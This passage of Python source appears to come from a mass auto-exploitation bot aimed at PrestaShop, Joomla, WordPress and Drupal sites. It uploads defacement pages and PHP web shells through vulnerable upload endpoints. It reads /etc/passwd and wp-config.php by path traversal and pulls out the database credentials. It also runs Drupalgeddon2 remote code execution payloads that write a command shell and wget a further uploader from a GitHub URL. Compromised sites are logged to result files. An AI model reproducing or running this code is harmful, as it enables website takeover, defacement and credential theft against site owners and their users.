self.Print_NotVuln('wg24themeadministration', site)
else:
self.Print_NotVuln('wg24themeadministration', site)
except:
self.Print_NotVuln('wg24themeadministration', site)
def fieldvmegamenu(self, site):
Exl = site + '/modules/fieldvmegamenu/ajax/upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('fieldvmegamenu', site)
else:
self.Print_NotVuln('fieldvmegamenu', site)
except:
self.Print_NotVuln('fieldvmegamenu', site)
def wdoptionpanel(self, site):
Exl = site + '/modules/wdoptionpanel/wdoptionpanel_ajax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
PostData = {'data': 'bajatax',
'type': 'image_upload'}
FileDataIndex = {'bajatax': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'bajatax': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/wdoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/wdoptionpanel/upload/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('wdoptionpanel', site)
else:
self.Print_NotVuln('wdoptionpanel', site)
except:
self.Print_NotVuln('wdoptionpanel', site)
def pk_flexmenu(self, site):
Exl = site + '/modules/pk_flexmenu/ajax/upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/pk_flexmenu/uploads/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/pk_flexmenu/uploads/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('pk_flexmenu', site)
else:
self.Print_NotVuln('pk_flexmenu', site)
except:
self.Print_NotVuln('pk_flexmenu', site)
def nvn_export_orders(self, site):
Exl = site + '/modules/nvn_export_orders/upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'images[]': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'images[]': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/nvn_export_orders/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/nvn_export_orders/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('nvn_export_orders', site)
else:
self.Print_NotVuln('nvn_export_orders', site)
except:
self.Print_NotVuln('nvn_export_orders', site)
def megamenu(self, site):
try:
Exp = site + '/modules/megamenu/uploadify/uploadify.php?id=pwn'
Checkvuln = requests.get('http://' + Exp, timeout=5)
FileDataIndex = {'Filedata': open(self.Jce_Deface_image, 'rb')}
if Checkvuln.status_code == 200:
requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
IndexPath = site + '/' + self.Jce_Deface_image.split('/')[1]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('megamenu', site)
else:
self.Print_NotVuln('megamenu', site)
except:
self.Print_NotVuln('megamenu', site)
def tdpsthemeoptionpanel(self, site):
Exl = site + '/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/tdpsthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/tdpsthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('tdpsthemeoptionpanel', site)
else:
self.Print_NotVuln('tdpsthemeoptionpanel', site)
except:
self.Print_NotVuln('tdpsthemeoptionpanel', site)
def psmodthemeoptionpanel(self, site):
Exl = site + '/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'image_upload': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'image_upload': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/modules/psmodthemeoptionpanel/upload/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/modules/psmodthemeoptionpanel/upload/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('psmodthemeoptionpanel', site)
else:
self.Print_NotVuln('psmodthemeoptionpanel', site)
except:
self.Print_NotVuln('psmodthemeoptionpanel', site)
def lib(self, site):
Exl = site + '/modules/lib/redactor/file_upload.php'
try:
Checkvuln = requests.get('http://' + Exl, timeout=5)
if Checkvuln.status_code == 200:
FileDataIndex = {'file': open(self.Jce_Deface_image, 'rb')}
FileDataShell = {'file': open(self.ShellPresta, 'rb')}
uploadedPathIndex = site + '/masseditproduct/uploads/file/' + self.Jce_Deface_image.split('/')[1]
uploadedPathShell = site + '/masseditproduct/uploads/file/' + self.ShellPresta.split('/')[1]
requests.post('http://' + Exl, files=FileDataIndex, timeout=5)
CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(uploadedPathIndex)
with open('result/Index_results.txt', 'a') as writer:
writer.write(uploadedPathIndex + '\n')
requests.post('http://' + Exl, files=FileDataShell, timeout=5)
Checkshell = requests.get('http://' + uploadedPathShell, timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(uploadedPathShell)
with open('result/Shell_results.txt', 'a') as writer:
writer.write(uploadedPathShell + '\n')
else:
self.Print_NotVuln('lib', site)
else:
self.Print_NotVuln('lib', site)
except:
self.Print_NotVuln('lib', site)
def Com_Jbcatalog(self, site):
Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php', timeout=10)
if Check.status_code == 200:
ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
files=ShellFile)
CheckShell = requests.get('http://' + site +
'/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n')
else:
ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
files=ShellFile)
CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/'
'php/files/' + self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
+ self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
+ self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_Jbcatalog', site)
else:
self.Print_NotVuln('Com_Jbcatalog', site)
def Com_SexyContactform(self, site):
Check = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/', timeout=10)
if Check.status_code == 200:
IndeX = {'files[]': open(self.Jce_Deface_image, 'rb')}
ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
requests.post('http://' + site + '/components/com_sexycontactform/fileupload/',
files=ShellFile, timeout=10)
CheckShell = requests.get('http://' + site +
'/components/com_sexycontactform/fileupload/files/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/components/com_sexycontactform/fileupload/files/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/components/com_sexycontactform/fileupload/files/up.php\n')
else:
requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
files=IndeX)
CheckIndex = requests.get('http://' + site + '/components/com_sexycontactform/fileupload/files/'
+ self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/components/com_sexycontactform/fileupload/files/'
+ self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/components/com_sexycontactform/fileupload/files/'
+ self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_SexyContactform', site)
else:
self.Print_NotVuln('Com_SexyContactform', site)
def Com_rokdownloads(self, site):
Check = requests.get('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
timeout=10)
if Check.status_code == 200 or Check.status_code == 500:
IndeX = {'files[]': open(self.Jce_Deface_image, 'rb')}
ShellFile = {'files[]': open(self.ShellPresta, 'rb')}
Datapost = {'jpath': '../../../../'}
requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
files=ShellFile, data=Datapost, timeout=10)
CheckShell = requests.get('http://' + site +
'/images/stories/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/stories/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/stories/up.php\n')
else:
requests.post('http://' + site + '/administrator/components/com_rokdownloads/assets/uploadhandler.php',
files=IndeX, data=Datapost, timeout=10)
CheckIndex = requests.get('http://' + site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_rokdownloads', site)
else:
self.Print_NotVuln('Com_rokdownloads', site)
def wp_miniaudioplayer(self, site):
CheckVuln = requests.get('http://' + site, timeout=10)
if 'wp-miniaudioplayer' in CheckVuln.text.encode('utf-8'):
etc = requests.get('http://' + site +
'/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd', timeout=5)
if 'nologin' in etc.text.encode('utf-8'):
with open('result/Passwd_file.text', 'a') as writer:
writer.write('---------------------------\nSite: ' + site + '\n' + etc.text.encode('utf-8') + '\n')
self.Print_Vuln('wp-miniaudioplayer', site)
else:
self.Print_NotVuln('wp-miniaudioplayer', site)
else:
self.Print_NotVuln('wp-miniaudioplayer', site)
def wp_support_plus_responsive_ticket_system(self, site):
try:
Exp = 'http://' + site + \
'/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \
'downloadAttachment.php?path=../../../../../wp-config.php'
GetConfig = requests.get(Exp, timeout=5)
if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
else:
self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
except:
self.Print_NotVuln('wp-support-plus-responsive-ticket-system', site)
def eshop_magic(self, site):
try:
Exp = 'http://' + site + \
'wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php'
GetConfig = requests.get(Exp, timeout=5)
if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('eshop-magic', site)
else:
self.Print_NotVuln('eshop-magic', site)
except:
self.Print_NotVuln('eshop-magic', site)
def ungallery(self, site):
try:
Exp = 'http://' + site + \
'/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php'
GetConfig = requests.get(Exp, timeout=5)
if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('ungallery', site)
else:
self.Print_NotVuln('ungallery', site)
except:
self.Print_NotVuln('ungallery', site)
def Com_extplorer(self, site):
Check = requests.get('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
timeout=10)
if Check.status_code == 200 or Check.status_code == 500:
IndeX = {'Filedata': open(self.Jce_Deface_image, 'rb')}
ShellFile = {'Filedata': open(self.ShellPresta, 'rb')}
requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
files=ShellFile, timeout=10)
CheckShell = requests.get('http://' + site +
'/images/stories/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/stories/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/stories/up.php\n')
else:
requests.post('http://' + site + '/administrator/components/com_extplorer/uploadhandler.php',
files=IndeX, timeout=10)
CheckIndex = requests.get('http://' + site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/images/stories/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_extplorer', site)
else:
self.Print_NotVuln('Com_extplorer', site)
def Com_jwallpapers_index(self, site):
try:
fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
post_data = {"name": self.Jce_Deface_image.split('/')[1],
"submit": "Upload"}
Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '"jsonrpc"' in GoT.text.encode('utf-8'):
Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
if 'GIF89a' in Check.text.encode('utf-8'):
self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_jwallpapers', site)
except:
self.Print_NotVuln('Com_jwallpapers', site)
def Com_jwallpapers_Shell(self, site):
try:
fileindex = {'file': open(self.indeX, 'rb')}
post_data = {"name": "vuln.php",
"submit": "Upload"}
Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '"jsonrpc"' in GoT.text.encode('utf-8'):
requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
if 'Vuln!!' in Check.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_jwallpapers_index(site)
elif 'Vuln!!' in Check2.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_jwallpapers_index(site)
elif 'Vuln!!' in Check3.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_jwallpapers_index(site)
else:
self.Com_jwallpapers_index(site)
except:
self.Com_jwallpapers_index(site)
def Com_facileforms(self, site):
Check = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
timeout=10)
if Check.status_code == 200 or Check.status_code == 500:
IndeX = {'Filedata': open(self.Jce_Deface_image, 'rb')}
ShellFile = {'Filedata': open(self.ShellPresta, 'rb')}
Datapost = {'folder': '/components/com_facileforms/libraries/jquery/'}
requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
files=ShellFile, data=Datapost, timeout=10)
CheckShell = requests.get('http://' + site +
'/components/com_facileforms/libraries/jquery/up.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/components/com_facileforms/libraries/jquery/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/components/com_facileforms/libraries/jquery/up.php\n')
else:
requests.post('http://' + site + '/components/com_facileforms/libraries/jquery/uploadify.php',
files=IndeX, data=Datapost, timeout=10)
CheckIndex = requests.get('http://' + site + '/components/com_facileforms/libraries/jquery/'
+ self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/components/com_facileforms/libraries/jquery/'
+ self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/components/com_facileforms/libraries/jquery/'
+ self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_facileforms', site)
else:
self.Print_NotVuln('Com_facileforms', site)
def barclaycart(self, site):
try:
ShellFile = {'Filedata': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
, 'multipart/form-data')}
Exp = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/uploadify.php'
requests.post(Exp, files=ShellFile, timeout=5)
Shell = 'http://' + site + '/wp-content/plugins/barclaycart/uploadify/' \
+ self.pagelinesExploitShell.split('/')[1]
GoT = requests.get(Shell, timeout=5)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('barclaycart plugin', site)
else:
self.Print_NotVuln('barclaycart plugin', site)
except:
self.Print_NotVuln('barclaycart plugin', site)
class DrupalGedden2(object):
def __init__(self, site):
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
try:
CheckVersion = requests.get('http://' + site, timeout=5)
if 'content="Drupal 7' in CheckVersion.text.encode('utf-8'):
self.Version7Drupal(site)
elif 'content="Drupal 8' in CheckVersion.text.encode('utf-8'):
self.Version8Drupal(site)
else:
self.Version7Drupal(site)
except:
self.Print_NotVuln('Drupalgeddon2', site)
def Print_NotVuln(self, NameVuln, site):
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
def Print_Vuln_index(self, indexPath):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
def Print_vuln_Shell(self, shellPath):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
def Version7Drupal(self, site):
try:
payloadshell = "Vuln!!<?php system($_GET['cmd']); ?>"
PrivatePAyLoad = "echo 'Vuln!! patch it Now!' > vuln.htm;" \
" echo '" + payloadshell + "'> sites/default/files/vuln.php;" \
" echo '" + payloadshell + "'> vuln.php;" \
" cd sites/default/files/;" \
" echo 'AddType application/x-httpd-php .jpg' > .htaccess;" \
" wget 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php'"
get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
'name[#markup]': PrivatePAyLoad, 'name[#type]': 'markup'}
post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
r = requests.post('http://' + site, data=post_params, params=get_params)
m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
if m:
found = m.group(1)
get_params = {'q': 'file/ajax/name/#value/' + found}
post_params = {'form_build_id': found}
requests.post('http://' + site, data=post_params, params=get_params)
a = requests.get('http://' + site + '/sites/default/files/vuln.php', timeout=5)
if 'Vuln!!' in a.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/sites/default/files/vuln.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/sites/default/files/vuln.php?cmd=id' + '\n')
gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
CheckUploader = requests.get('http://' + site + '/sites/default/files/up.php', timeout=5)
if 'Vuln!!' in CheckUploader.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/sites/default/files/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/sites/default/files/up.php' + '\n')
if 'Vuln!!' in gg.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in gg.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
Checkshell = requests.get('http://' + site + '/vuln.php', timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/vuln.php?cmd=id' + '\n')
else:
self.Print_NotVuln('Drupalgeddon2', site)
else:
self.Print_NotVuln('Drupalgeddon2', site)
except:
self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
def Version8Drupal(self, site):
try:
Exp = site + '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payloadshell = "<?php system($_GET['cmd']); ?>"
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> vuln.htm'}
payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + payloadshell + '"> vuln.php'}
r = requests.post('http://' + Exp, data=payload, timeout=5)
if r.status_code == 200:
a = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in a.text.encode('utf-8'):
requests.post('http://' + Exp, data=payload2, timeout=5)
CheckShell = requests.get('http://' + site + '/vuln.php', timeout=5)
